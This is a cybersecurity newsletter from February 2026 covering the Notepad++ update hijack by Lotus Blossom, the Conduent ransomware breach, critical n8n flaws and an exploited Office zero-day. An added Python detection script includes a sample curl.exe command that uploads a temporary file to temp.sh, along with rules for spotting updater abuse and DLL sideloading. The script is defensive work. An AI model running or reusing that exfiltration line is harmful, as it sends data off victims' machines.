Notepad++ updates hijacked by Chinese state hackers
Chinese state-sponsored group Lotus Blossom hijacked Notepad++'s update mechanism for six months. Also: Conduent ransomware breach hits 25M+ Americans, critical n8n sandbox escape enables RCE, and a Microsoft Office zero-day is under active exploitation with a CISA KEV deadline of February 16.
From The Bit Baker Daily Briefing — February 8, 2026
PLUS: Conduent breach exposes millions of Americans' benefits data, critical n8n flaws, and a Russian zero-day
Good morning, Dave. For six months, a Chinese state-sponsored group camped inside Notepad++'s update pipeline — pushing espionage payloads to handpicked government targets while millions of everyday users didn't notice a thing. Quiet. Surgical. Deeply unsettling.
In today's security Bit Baker:
- Notepad++ update mechanism hijacked by Chinese APT Lotus Blossom
- Conduent ransomware breach balloons to 25 million affected Americans
- Critical n8n vulnerabilities let attackers run system commands via webhooks
- Microsoft Office zero-day bypasses kill bit protections under active exploitation
Notepad++ Update Mechanism Hijacked in Six-Month Chinese Espionage Campaign
The Bit Baker: Chinese state-sponsored group Lotus Blossom broke into Notepad++'s shared hosting server and weaponized the WinGUP update mechanism to slip trojanized installers to government and financial targets across Southeast Asia — all between June and December 2025.
Unpacked:
- Tracked under the aliases Lotus Blossom, Billbug, and Chrysalis, the attackers hijacked Notepad++'s WinGUP auto-updater to deliver malicious NSIS installers bundled with Cobalt Strike Beacons, sideloaded DLLs (log.dll), and Metasploit downloaders aimed at high-value targets in Vietnam, the Philippines, El Salvador, and Australia.
- Reconnaissance payloads ran through AutoUpdater.exe and Lua scripts to fingerprint victim machines, quietly shipping the results to temp.sh via curl.exe. Because delivery was selective, the vast majority of Notepad++ users were never exposed, but that narrow targeting also made detection far harder.
- Notepad++ has shipped v8.9.1 with XML signature validation for updates. IoCs are now available from Rapid7, Kaspersky, and Orca Security so organizations can sweep their environments for signs of compromise.
Bottom line: Few supply chain attacks have been this precise — a state-backed group embedded itself inside a trusted update pipeline for half a year, cherry-picking espionage targets while everyone else saw business as usual. If you're running Notepad++, update to v8.9.1 now and check for the published IoCs. Expect fresh scrutiny of how open-source projects secure their distribution channels.
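Detection logic for the updater-abuse pattern described above (AutoUpdater.exe driving curl.exe uploads to temp.sh, Lua reconnaissance, and the sideloaded log.dll), as an added example that is not code from Notepad++ or from any vendor's IoC package. The event schema, the sample events, and the Lua interpreter file naming are constructed assumptions for this example; the only indicators used are the ones named in the text.

```python
import re

UPDATER = "autoupdater.exe"                      # updater process named in the text
EXFIL_HOST = re.compile(r"\btemp\.sh\b", re.IGNORECASE)

# Constructed sample of process-creation and image-load events.
# Field names are an assumption for this example, not a real log schema.
SAMPLE_EVENTS = [
    {"kind": "process", "parent": r"C:\Program Files\Notepad++\AutoUpdater.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl.exe -F "f=@C:\Users\u\AppData\Local\Temp\host.txt" https://temp.sh/upload'},
    {"kind": "process", "parent": r"C:\Program Files\Notepad++\AutoUpdater.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\lua54.exe",      # Lua name is an assumption
     "cmdline": r"lua54.exe recon.lua"},
    {"kind": "imageload", "image": r"C:\Users\u\AppData\Local\Temp\helper.exe",
     "loaded": r"C:\Users\u\AppData\Local\Temp\log.dll"},
    {"kind": "process", "parent": r"C:\Windows\explorer.exe",            # benign control
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r"curl.exe https://example.invalid/readme.txt"},
    {"kind": "imageload", "image": r"C:\Program Files\Notepad++\notepad++.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll"},                    # benign control
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (separator-agnostic)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event: dict) -> list[str]:
    """Return the names of the rules an event trips (empty list if none)."""
    hits = []
    if event["kind"] == "process":
        parent, image, cmd = basename(event["parent"]), basename(event["image"]), event["cmdline"]
        # Rule 1: curl.exe shipping anything to temp.sh, regardless of parent.
        if image == "curl.exe" and EXFIL_HOST.search(cmd):
            hits.append("curl_to_temp_sh")
        # Rule 2: the updater has no business spawning curl or a Lua interpreter.
        if parent == UPDATER and (image == "curl.exe" or image.startswith("lua")):
            hits.append("updater_spawned_tool")
    elif event["kind"] == "imageload":
        # Rule 3: log.dll loaded from outside C:\Windows is a sideloading lead.
        loaded = event["loaded"]
        if basename(loaded) == "log.dll" and not loaded.lower().startswith("c:\\windows\\"):
            hits.append("log_dll_sideload")
    return hits

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> tripped rules, for every event that tripped at least one."""
    return {i: h for i, e in enumerate(events) if (h := evaluate(e))}
```

Rule 2 is the one with the highest signal: even if the exfiltration host or DLL name changes, the updater spawning a network or scripting tool is behaviour that a clean WinGUP run never produces.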
Conduent Ransomware Breach Scope Balloons to 25 Million Americans
The Bit Baker: Government services contractor Conduent has confirmed that a ransomware attack stole personal data from far more Americans than initially disclosed. The verified victim count now tops 25.9 million across multiple state programs.
Unpacked:
- Conduent handles Medicaid claims, child support payments, and SNAP benefits for over 100 million Americans. What got stolen? Names, Social Security numbers, health records, and financial data — and state attorneys general are still tallying the full victim count from affected programs.
- The company admitted "a significant number of individuals' personal information" was taken but hasn't released a centralized accounting of exactly how many people across all states are affected, leaving millions uncertain whether their benefits data was compromised.
- Breach-related costs are expected to hit at least $25 million through early 2026, covering notification, credit monitoring, and legal expenses from what's shaping up to be one of the largest govtech breaches on record.
Bottom line: Funneling sensitive government data through a handful of massive private contractors creates a single point of catastrophic failure — and when one contractor falls, millions of the most vulnerable people bear the consequences. If you partner with govtech providers, demand third-party security audits and incident notification SLAs before the next breach makes your data someone else's problem.
Critical n8n Flaw Lets Attackers Run System Commands Through Public Webhooks
The Bit Baker: A CVSS 9.4 vulnerability in n8n workflow automation (CVE-2026-25049) lets attackers escape the expression sandbox and run arbitrary system commands via workflows exposed through unauthenticated public webhooks — and here's the kicker: it's actually a bypass of a previous CVSS 9.9 fix.
Unpacked:
- At the heart of the flaw is a TypeScript/JavaScript type mismatch: compile-time type enforcement simply doesn't apply to attacker-produced values at runtime, so malicious expressions slip past five separate security layers — regex checks, AST sanitization, and the original CVE-2025-68613 sandbox fix — using destructuring syntax and process.binding() calls.
- Alongside this vulnerability, n8n disclosed 11 additional security flaws, five of them rated critical (CVSS 9.4), spanning command injection, file access, Git node exploitation, and Python sandbox escape — potentially exposing hundreds of thousands of enterprise AI and automation systems to complete takeover.
- Patches ship in n8n versions 1.123.17 and 2.5.2. Organizations that can't update right away should lock down workflow creation to trusted users and kill public webhooks, per the official security bulletin.
Bottom line: When a single line of JavaScript can bypass the fix for a CVSS 9.9 flaw, it tells you just how brittle sandbox mechanisms really are — especially on platforms that evaluate user-supplied code by design. Anyone running n8n should treat this patch cycle as an emergency. Drop everything and update.
Microsoft Office Zero-Day Bypasses Kill Bit Protections Under Active Exploitation
The Bit Baker: Microsoft pushed an emergency out-of-band patch for CVE-2026-21509, a zero-day in Microsoft Office that bypasses OLE security mitigations to execute code through malicious documents. CISA has set a February 16 remediation deadline after confirming active exploitation in the wild.
Unpacked:
- Rated CVSS 7.8, the flaw sidesteps the "kill bit" mechanism that's supposed to block dangerous COM objects. A malicious document can load Shell.Explorer.1 — an embedded Internet Explorer control — without triggering macro warnings or "Enable Content" prompts, handing attackers code execution the instant a victim opens the file.
- Every major Office version is in the blast radius: Office 2016, 2019, LTSC 2021, LTSC 2024, and Microsoft 365 Apps for Enterprise. Exploitation so far has been targeted rather than widespread, pointing to sophisticated threat actors with specific objectives.
- Office 2021 and later pick up automatic server-side protection after an app restart. Running Office 2016 or 2019? You'll need specific patches (KB5002713 for 2016) or a registry-based kill bit workaround to bridge the gap until February Patch Tuesday delivers the permanent fix.
Bottom line: Silent code execution on document open — no macros, no prompts, nothing. That's the nightmare scenario, and the broad version coverage means practically every organization running Microsoft Office is exposed. Patch now or apply the kill bit workaround. The CISA KEV deadline is eight days out.
The Shortlist
Substack confirmed a data breach that exposed user email addresses and phone numbers after an unauthorized third party accessed platform data back in October 2025. The company didn't discover the intrusion until early February 2026 — a four-month blind spot.
Ransomware actors are hammering CVE-2026-24423 in SmarterMail and CVE-2025-22225 in VMware ESXi. CISA has added the SmarterMail flaw to the KEV catalog for the third time in two weeks, and 267 fresh ransomware victims have surfaced this month alone.
Security researchers found a new EDR killer malware abusing a decade-old EnCase forensics driver — its certificate was revoked over 10 years ago but still loads on Windows — capable of disabling 59 endpoint security products.
References
- Help Net Security: Notepad++ supply chain attack IOCs and targets
- Arctic Wolf: Notepad++ publishes full details of 2025 compromise
- Tenable: FAQ about Notepad++ supply chain compromise
- ThreatLocker: Notepad++ trojanized updates in suspected nation-state attack
- Notepad++ official incident report
- TechCrunch: Conduent data breach balloons affecting millions more Americans
- HIPAA Journal: Conduent victim count swells to over 25M
- WebProNews: Inside the Conduent data breach
- The Hacker News: Critical n8n flaw CVE-2026-25049
- SecureLayer7: CVE-2026-25049 technical analysis
- Pillar Security: n8n sandbox escape exposes enterprise AI systems
- n8n community: Security bulletin February 6, 2026
- Orca Security: CVE-2026-21509 Microsoft Office zero-day analysis
- XM Cyber: Microsoft Office zero-day vulnerability
- Malwarebytes: Office zero-day lets documents slip past security
- TechCrunch: Substack confirms data breach
- Help Net Security: Ransomware exploiting SmarterMail and VMware ESXi
- Help Net Security: EDR killer malware and week in review